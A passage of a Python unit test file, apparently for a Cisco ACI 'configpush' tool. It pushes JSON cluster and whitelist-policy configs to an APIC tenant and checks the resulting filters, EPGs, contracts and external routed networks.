"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 17,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 18,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 19,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 4,
"filter count did not match for the pushed config and existing config")
for existing_filter in existing_filters:
self.assertTrue(
existing_filter.name in [
'1.0.0_Filter',
'17.1.1_Filter',
'18.0.0_Filter',
'19.1.1_Filter'])
self.assertTrue(existing_filter.name != '6.0.0_Filter')
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 4,
"num of filters in contract_subject did not match " + child_contract_subject.name)
for contract_subject_filter in child_contract_subject.get_filters():
self.assertTrue(
contract_subject_filter.name in [
'1.0.0_Filter',
'17.1.1_Filter',
'18.0.0_Filter',
'19.1.1_Filter'])
self.assertTrue(contract_subject_filter.name != '6.0.0_Filter')
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_policies(self):
"""
changing the source and destination of the policy. so the contract should be updated with respect to this
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c3d31561707035c0c12b00",
"dst": "56c55b8761707062b2d11b00",
"src_name": "Configpushtest-policy*-(2)",
"dst_name": "Configpushtest-policy*-(1)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
self.assertEqual(existing_contract.name, "Configpushtest_-_2_-1::Configpushtest_-_1_-0",
"contract name did not match with the config")
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
self.assertEqual(child_contract_subject.name,
"Configpushtest_-_2_-1::Configpushtest_-_1_-0_Subject",
"contract_subject name did not match with the config")
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_policies_addition(self):
"""
adding a new policy.
now the contracts should be 2 without changing the filters and epgs
the epgs count should be only 2 now
when we push this config tp apic, the EPGs should stay as is and the new EPGS should not be added, count should match to two.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
},
{
"src": "56c3d31561707035c0c12b00",
"dst": "56c55b8761707062b2d11b00",
"src_name": "Configpushtest-policy*-(2)",
"dst_name": "Configpushtest-policy*-(1)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 17,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 18,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 4,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 2,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
if existing_contract.name == "Configpushtest_-_1_-0::Configpushtest_-_2_-1":
self.assertEqual(existing_contract.name, "Configpushtest_-_1_-0::Configpushtest_-_2_-1",
"contract name did not match with the config")
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
self.assertEqual(child_contract_subject.name,
"Configpushtest_-_1_-0::Configpushtest_-_2_-1_Subject",
"contract_subject name did not match with the config")
elif existing_contract.name == "Configpushtest_-_2_-1::Configpushtest_-_1_-0":
self.assertEqual(existing_contract.name, "Configpushtest_-_2_-1::Configpushtest_-_1_-0",
"contract name did not match with the config")
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
self.assertEqual(child_contract_subject.name,
"Configpushtest_-_2_-1::Configpushtest_-_1_-0_Subject",
"contract_subject name did not match with the config")
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_external_initial(self):
"""
initial test to configpush with l3out epgs
firstly delete the existing tenant and push the config for the first time.
config has external true for 1 policy and external false for the other
after pushing the config there should be 1 epg in appProfile and 1 in External routed networks
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"external": true,
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
tenant_name = 'configpush-test'
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(
app.name,
'appProfile-test',
"application profile name didnot match with the default appProfile-test")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
'l3ext-test',
"External routed network with default name doesnot exist l3ext-test")
for outsideL3 in outsideL3s:
if outsideL3.name == 'l3ext-test':
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEquals(len(outsideEpgs), 1, "the num of outside epgs didnot match")
for outsideEpg in outsideEpgs:
self.assertEquals(outsideEpg.name, "Configpushtest_-_2_-1", "outside EPG name didnot match")
self.assertNotEquals(
outsideEpg.name,
"Configpushtest_-_1_-0",
"outside EPG name didnot match")
self.assertEqual(len(outsideEpg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + outsideEpg.name)
self.assertEqual(len(outsideEpg.get_all_provided()), 1,
"provided EPG did not match for EPG " + outsideEpg.name)
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 1,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
self.assertNotEquals(existing_epg.name, "Configpushtest_-_2_-1", "outside EPG name didnot match")
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contractSubject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contractSubject.get_filters()), 2,
"num of filters in contract subject did not match " + child_contractSubject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_for_external(self):
"""
after the initial l3out push changing the external to true for the cluster with name Configpushtest*-(1)
after pushing this there should be 2 l3out epgs in external routed netwroks and no epg in appProfile
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"external": true,
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"external": true,
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
tenant_name = 'configpush-test'
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(
app.name,
'appProfile-test',
"application profile name didnot match with the default appProfile-test")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
'l3ext-test',
"External routed network with default name doesnot exist l3ext-test")
for outsideL3 in outsideL3s:
if outsideL3.name == 'l3ext-test':
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEquals(len(outsideEpgs), 2, "the num of outside epgs didnot match")
for existing_epg in outsideEpgs:
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 0,
"epgs count did not match for the pushed config and existing config")
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contractSubject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contractSubject.get_filters()), 2,
"num of filters in contract subject did not match " + child_contractSubject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_for_external_delete(self):
"""
changing the external to false for the cluster with name Configpushtest*-(1)
after pushing this there should be 2 l3out epgs in external routed netwroks and a single epg in appProfile
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"external": true,
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(
app.name,
'appProfile-test',
"application profile name didnot match with the default appProfile-test")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
'l3ext-test',
"External routed network with default name doesnot exist l3ext-test")
for outsideL3 in outsideL3s:
if outsideL3.name == 'l3ext-test':
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEquals(len(outsideEpgs), 2, "the num of outside epgs didnot match")
for existing_epg in outsideEpgs:
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 0,
"epgs count did not match for the pushed config and existing config")
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contractSubject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contractSubject.get_filters()), 2,
"num of filters in contract subject did not match " + child_contractSubject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_for_external_policy(self):
"""
changing the source and destination of the policy. so the contract should be updated with respect to this
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"external": true,
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"external": true,
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c3d31561707035c0c12b00",
"dst": "56c55b8761707062b2d11b00",
"src_name": "Configpushtest-policy*-(2)",
"dst_name": "Configpushtest-policy*-(1)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 7,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
for existing_filter in existing_filters:
self.assertTrue(existing_filter.name in ['1.0.0_Filter', '7.0.0_Filter'])
self.assertTrue(existing_filter.name != '6.0.0_Filter')
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(
app.name,
'appProfile-test',
"application profile name didnot match with the default appProfile-test")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
'l3ext-test',
"External routed network with default name doesnot exist l3ext-test")
for outsideL3 in outsideL3s:
if outsideL3.name == 'l3ext-test':
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEquals(len(outsideEpgs), 2, "the num of outside epgs didnot match")
for existing_epg in outsideEpgs:
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 0,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
self.assertNotEquals(existing_epg.name, "Configpushtest_-_2_-1", "outside EPG name didnot match")
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contractSubject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contractSubject.get_filters()), 2,
"num of filters in contract subject did not match " + child_contractSubject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_useipEpg_configpush_for_policy(self):
"""
after the initial push
when we use ipEpgs, uSeg EPGS are created instead of Application EPGs
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(4)",
"id": "56c55b8761707062b2d14b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(5)",
"id": "56c3d31561707035c0c15b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.129",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d14b00",
"dst": "56c3d31561707035c0c15b00",
"src_name": "Configpushtest-policy*-(6)",
"dst_name": "Configpushtest-policy*-(7)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 17,
"action": "ALLOW"
}
]
}
]
}
"""
tenant_name = 'configpush-test'
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False, useipEpgs=True)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 3,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
if existing_epg.name != 'base':
self.assertTrue(existing_epg.is_attributed_based,
"uSeg EPG is not created for " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 1,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 1,
"existing_contexts count did not match for the pushed config and existing config")
def test_useipEpg_node_update_configpush_for_policy(self):
"""
after the initial push of useipepgs
when we use ipEpgs, uSeg EPGS are created instead of Application EPGs
and the 2 uSeg Attribute should be existing in both EPGS from the previous run
and the contract should be pointing to the latest epgs
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(4)",
"id": "56c55b8761707062b2d14b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-421"
}
]
},
{
"name": "Configpushtest*-(5)",
"id": "56c3d31561707035c0c15b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-423"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d14b00",
"dst": "56c3d31561707035c0c15b00",
"src_name": "Configpushtest-policy*-(6)",
"dst_name": "Configpushtest-policy*-(7)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
